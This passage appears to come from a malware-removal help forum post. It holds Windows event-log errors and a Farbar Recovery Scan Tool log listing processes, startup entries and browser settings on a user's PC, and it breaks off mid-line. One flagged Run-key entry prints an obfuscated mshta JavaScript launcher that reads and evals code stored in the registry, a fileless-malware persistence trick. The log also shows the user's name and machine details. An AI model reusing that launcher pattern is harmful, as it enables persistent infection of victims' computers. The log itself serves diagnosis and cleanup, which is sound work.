7408029d-e62b-49d3-bd30-43045442e2fe Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 02:46:17 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c800 Faulting process id: 0x2fc0 Faulting application start time: 0x01d22a51d3b16841 Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: 103d44b3-1281-4519-a9bf-6c6c711dfc2c Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 02:40:37 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c770 Faulting process id: 0x1264 Faulting application start time: 0x01d22a50d36e52ff Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: e2dfffd1-443e-45cf-acf7-2ce5a5b5b71a Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 06:31:05 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c781 Faulting process id: 0x3130 Faulting application start time: 0x01d22a0cbb2b8562 Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: 646d47c2-874c-43dc-be1d-ba2bba4231da Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 06:30:53 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program chrome.exe version 53.0.2785.143 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 43e4 Start Time: 01d22a0c48a188c6 Termination Time: 60000 Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Report Id: 144ac6ff-9600-11e6-855e-303a64eb8330 Faulting package full name: Faulting package-relative application ID: System errors: ============= Error: (10/19/2016 02:59:38 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly. It has done this 4 time(s). Error: (10/19/2016 02:59:09 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Connectivity Manager for Gramblr service terminated unexpectedly. It has done this 2 time(s). The following corrective action will be taken in 500 milliseconds: Restart the service. Error: (10/19/2016 02:59:09 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The Windows Connectivity Manager for Gramblr service terminated with the following error: Incorrect function. Error: (10/19/2016 02:58:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Connectivity Manager for Gramblr service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 500 milliseconds: Restart the service. Error: (10/19/2016 02:58:25 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The Windows Connectivity Manager for Gramblr service terminated with the following error: Incorrect function. Error: (10/19/2016 02:56:39 PM) (Source: DCOM) (EventID: 10010) (User: Kyle-PC) Description: The server MicrosoftEdge did not register with DCOM within the required timeout. Error: (10/19/2016 02:52:44 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly. It has done this 3 time(s). Error: (10/19/2016 02:46:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly. It has done this 2 time(s). Error: (10/19/2016 02:40:37 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly. It has done this 1 time(s). Error: (10/19/2016 02:39:58 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY) Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout. CodeIntegrity: =================================== Date: 2016-10-19 14:36:00.227 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 23:53:53.561 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 20:48:33.285 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 19:51:48.344 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 14:27:52.440 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 13:52:28.063 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 13:34:12.922 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-17 14:58:52.353 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-16 16:33:13.963 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-16 06:22:11.554 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz Percentage of memory in use: 44% Total physical RAM: 8122.15 MB Available physical RAM: 4504.35 MB Total Virtual: 9402.15 MB Available Virtual: 5289.18 MB ==================== Drives ================================ Drive c: (Windows) (Fixed) (Total:907.42 GB) (Free:484.27 GB) NTFS Drive d: (RECOVERY) (Fixed) (Total:22.23 GB) (Free:2.5 GB) NTFS ==>[system with boot components (obtained from drive)] ==================== MBR & Partition Table ================== ==================== End of Addition.txt ============================
  6. Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016 Ran by Kyle Aniel (ATTENTION: The user is not administrator) on KYLE-PC (19-10-2016 14:47:59) Running from C:\Users\Kyle Aniel\Downloads Loaded Profiles: Kyle Aniel (Available Profiles: Kyle Aniel & Izach Aniel & banie_000 & Guest) Platform: Windows 10 Home Version 1607 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: Chrome) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) Failed to access process -> smss.exe Failed to access process -> csrss.exe Failed to access process -> wininit.exe Failed to access process -> csrss.exe Failed to access process -> winlogon.exe Failed to access process -> services.exe Failed to access process -> lsass.exe Failed to access process -> svchost.exe Failed to access process -> svchost.exe Failed to access process -> svchost.exe Failed to access process -> dwm.exe Failed to access process -> WUDFHost.exe Failed to access process -> svchost.exe Failed to access process -> OmniServ.exe Failed to access process -> svchost.exe Failed to access process -> svchost.exe Failed to access process -> svchost.exe Failed to access process -> svchost.exe Failed to access process -> igfxCUIService.exe Failed to access process -> svchost.exe Failed to access process -> svchost.exe Failed to access process -> hpservice.exe Failed to access process -> RtkAudioService64.exe Failed to access process -> RAVBg64.exe Failed to access process -> RAVBg64.exe Failed to access process -> svchost.exe Failed to access process -> svchost.exe Failed to access process -> spoolsv.exe Failed to access process -> svchost.exe Failed to access process -> AdAppMgrSvc.exe Failed to access process -> mDNSResponder.exe Failed to access process -> AppleMobileDeviceService.exe Failed to access process -> OfficeClickToRun.exe Failed to access process -> armsvc.exe Failed to access process -> remoting_host.exe Failed to access process -> HD-LogRotatorService.exe Failed to access process -> HPWMISVC.exe Failed to access process -> svchost.exe Failed to access process -> Verizon_IHAMessageCenter.exe Failed to access process -> ibtsiva.exe Failed to access process -> gramblr.exe Failed to access process -> HeciServer.exe Failed to access process -> mbamscheduler.exe Failed to access process -> mbamservice.exe Failed to access process -> mcsacore.exe Failed to access process -> mfevtps.exe Failed to access process -> UpdateService.exe Failed to access process -> mfemms.exe Failed to access process -> SRService.exe Failed to access process -> PEFService.exe Failed to access process -> SSUService.exe Failed to access process -> svchost.exe Failed to access process -> PMBDeviceInfoProvider.exe Failed to access process -> SynTPEnhService.exe Failed to access process -> svchost.exe Failed to access process -> dasHost.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe Failed to access process -> SRManager.exe Failed to access process -> mfevtps.exe Failed to access process -> WmiPrvSE.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe Failed to access process -> mfefire.exe Failed to access process -> mfefire.exe Failed to access process -> McAPExe.exe Failed to access process -> McSvHost.exe Failed to access process -> svchost.exe Failed to access process -> PresentationFontCache.exe Failed to access process -> SRFeature.exe Failed to access process -> SRServer.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe Failed to access process -> GoogleCrashHandler.exe Failed to access process -> GoogleCrashHandler64.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe Failed to access process -> opvapp.exe (McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\mfp.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe Failed to access process -> hpqwmiex.exe Failed to access process -> SearchIndexer.exe Failed to access process -> WmiPrvSE.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Microsoft Corporation) C:\Windows\System32\InstallAgent.exe (Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe (Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe (Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe (Spotify Ltd) C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe (Flux Software LLC) C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe Failed to access process -> McCSPServiceHost.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe (Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hp\HP System Event\HPMSGSVC.exe (Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe (Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe Failed to access process -> HPSA_Service.exe Failed to access process -> HPSupportSolutionsFrameworkService.exe (Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe Failed to access process -> IAStorDataMgrSvc.exe Failed to access process -> IntelMeFWService.exe Failed to access process -> jhi_service.exe Failed to access process -> LMS.exe (Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ActionUriServer.exe Failed to access process -> ModuleCoreService.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Failed to access process -> rundll32.exe (Node.js) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\Resources\bin\node.exe Failed to access process -> svchost.exe Failed to access process -> McClientAnalytics.exe Failed to access process -> wermgr.exe Failed to access process -> SearchProtocolHost.exe (FXHOME) C:\Program Files\FXHOME\HitFilm 4 Express\HitFilmExpress.exe () C:\Program Files\FXHOME\HitFilm 4 Express\Skyway_Guard.exe (Node.js) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\Resources\bin\node.exe Failed to access process -> mfeicfcore.exe Failed to access process -> WerFault.exe (The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe (The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe Failed to access process -> fontdrvhost.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Failed to access process -> VzDetectAgent.exe Failed to access process -> conhost.exe (The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe (The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe Failed to access process -> SearchFilterHost.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8505088 2015-07-03] (Realtek Semiconductor) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech, Inc.) HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard) HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard) HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954296 2015-12-11] (Synaptics Incorporated) HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [ADSK DLMSession] => C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe [1627032 2014-02-05] (Autodesk, Inc.) HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [493960 2014-12-04] (Autodesk Inc.) HKLM-x32\...\Run: [ICF] => C:\Program Files (x86)\Internet Content Filter\mfp.exe [3331408 2013-08-19] (McAfee, Inc.) HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2000896 2014-04-04] (iSkySoft) HKLM-x32\...\Run: [PMBVolumeWatcher] => C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe [2669568 2015-04-17] (Sony Corporation) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597552 2015-08-04] (Oracle Corporation) HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [653576 2015-06-29] (Hewlett-Packard Development Company, L.P.) HKLM\...\RunOnce: [SRS_APO_Install] => C:\WINDOWS\system32\SRSLabs\{176F4E15-8F7C-4833-ADED-81FAE8CCD186}\slInit64.dll [214776 2015-07-03] (SRS Labs, Inc.) HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Power2GoExpress8] => 0 HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Google Update] => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [107848 2015-04-30] (Google Inc.) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [HP ENVY 7640 series (NET)] => C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe [3483656 2014-08-22] (Hewlett-Packard Development Company, LP) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [iFunBox] => C:\Program Files (x86)\i-Funbox DevTeam\iFunBox_x64.exe [2783232 2015-07-27] (i-Funbox.com) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [MurGee.com Auto Clicker] => C:\Users\Kyle Aniel\AppData\Roaming\Auto Clicker\AutoClicker.exe [124072 2016-04-20] (MurGee.com) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify Web Helper] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1555056 2016-08-13] (Spotify Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\Spotify.exe [6937200 2016-08-13] (Spotify Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Air Mouse Server] => C:\Users\Kyle Aniel\Downloads\AirMouse.exe [202240 2016-10-01] () HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [f.lux] => C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**bquflhx<*>] => "C:\WINDOWS\system32\mshta.exe" javascript:RHY2M="cnlfCDX";P1x=new%20ActiveXObject("WScript.Shell");Bvpcj7n4V="bzjV";mzF9K7=P1x.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");N1QuJVU="T";eval(mzF9K7); (the data entry has 17 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**xwhehhqlxw<*>] => "C:\Users\Kyle Aniel\AppData\Local\f70e5\db038.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\RunOnce: [Uninstall C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64" Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3509d.lnk [2016-10-19] Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2015-11-13] ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation) GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1001\User: Restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{849d57b1-e8c7-4cf9-a689-c5cbbe5b3d71}: [DhcpNameServer] 192.168.48.1 Tcpip\..\Interfaces\{caebb8ce-2c7b-43c1-bdca-7787c2b0f2a1}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1 HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1 SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = SearchScopes: HKLM-x32 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKLM-x32 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = SearchScopes: HKU\.DEFAULT -> DefaultScope {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms} SearchScopes: HKU\.DEFAULT -> {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms} SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> DefaultScope {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms} SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms} BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-10-08] (Microsoft Corporation) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-10-08] (Microsoft Corporation) BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-16] (Oracle Corporation) BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-04-04] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-10-16] (Oracle Corporation) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard) Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-07-07] (McAfee, Inc.) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-07-07] (McAfee, Inc.) FireFox: ======== FF ProfilePath: C:\Users\Kyle 